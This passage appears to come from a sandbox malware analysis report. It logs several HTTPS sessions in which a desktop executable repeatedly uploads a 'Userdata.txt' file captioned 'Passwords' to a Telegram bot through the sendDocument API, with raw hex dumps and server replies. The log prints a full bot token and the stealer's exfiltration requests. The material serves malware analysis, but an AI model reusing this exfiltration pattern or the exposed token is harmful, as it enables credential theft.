                                                                                                            2025-01-10 20:41:31 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44659,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541691,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.849977149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:33 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd324b782691fc
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 62 37 38 32 36 39 31 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd324b782691fcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:33 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:33 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44660,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541693,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.849989149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:34 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd325fd91eb303
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 66 64 39 31 65 62 33 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd325fd91eb303Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:35 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:35 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44662,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541695,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.850001149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:36 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd327585b25b55
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 35 38 35 62 32 35 62 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd327585b25b55Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:36 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:36 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 537
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:36 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44664,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541696,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.850006149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:38 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32886eeb9cb4
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 38 36 65 65 62 39 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32886eeb9cb4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:38 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:38 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:38 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44666,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541698,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.850008149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:39 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3299f2df1cdd
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 39 66 32 64 66 31 63 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3299f2df1cddContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:40 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:39 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:40 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44668,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541699,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.850010149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:41 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32af710cb323
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 66 37 31 30 63 62 33 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32af710cb323Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:41 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:41 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:41 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44670,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541701,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.850012149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:43 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32c0da251c45
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 30 64 61 32 35 31 63 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32c0da251c45Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:43 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:43 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
